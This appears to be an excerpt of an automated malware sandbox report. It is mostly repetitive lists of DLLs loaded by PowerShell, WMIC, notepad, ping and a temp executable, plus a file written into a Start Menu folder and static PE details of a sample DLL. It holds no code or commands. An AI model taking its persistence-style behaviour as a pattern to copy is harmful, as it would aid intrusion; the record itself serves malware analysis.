Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeSection loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeSection loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeSection loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeSection loaded: wldp.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeSection loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeSection loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeSection loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeSection loaded: wldp.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
Source: C:\Windows\System32\notepad.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\notepad.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\notepad.exeSection loaded: mrmcorer.dll
Source: C:\Windows\System32\notepad.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\notepad.exeSection loaded: wldp.dll
Source: C:\Windows\System32\notepad.exeSection loaded: textshaping.dll
Source: C:\Windows\System32\notepad.exeSection loaded: efswrt.dll
Source: C:\Windows\System32\notepad.exeSection loaded: mpr.dll
Source: C:\Windows\System32\notepad.exeSection loaded: wintypes.dll
Source: C:\Windows\System32\notepad.exeSection loaded: twinapi.appcore.dll
Source: C:\Windows\System32\notepad.exeSection loaded: oleacc.dll
Source: C:\Windows\System32\notepad.exeSection loaded: textinputframework.dll
Source: C:\Windows\System32\notepad.exeSection loaded: coreuicomponents.dll
Source: C:\Windows\System32\notepad.exeSection loaded: coremessaging.dll
Source: C:\Windows\System32\notepad.exeSection loaded: ntmarta.dll
Source: C:\Windows\System32\notepad.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\notepad.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\notepad.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\notepad.exeSection loaded: netutils.dll
Source: C:\Windows\System32\notepad.exeSection loaded: propsys.dll
Source: C:\Windows\System32\notepad.exeSection loaded: policymanager.dll
Source: C:\Windows\System32\notepad.exeSection loaded: msvcp110_win.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
Source: C:\Windows\SysWOW64\PING.EXESection loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\PING.EXESection loaded: winnsi.dll
Source: C:\Windows\SysWOW64\PING.EXESection loaded: mswsock.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
Source: C:\Windows\SysWOW64\PING.EXESection loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\PING.EXESection loaded: winnsi.dll
Source: C:\Windows\SysWOW64\PING.EXESection loaded: mswsock.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
Source: C:\Windows\SysWOW64\PING.EXESection loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\PING.EXESection loaded: winnsi.dll
Source: C:\Windows\SysWOW64\PING.EXESection loaded: mswsock.dll
Source: C:\Windows\System32\wbem\WMIC.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile written: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.iniJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
Source: R7bv9d6gTH.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: R7bv9d6gTH.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: R7bv9d6gTH.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: R7bv9d6gTH.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: R7bv9d6gTH.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: R7bv9d6gTH.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
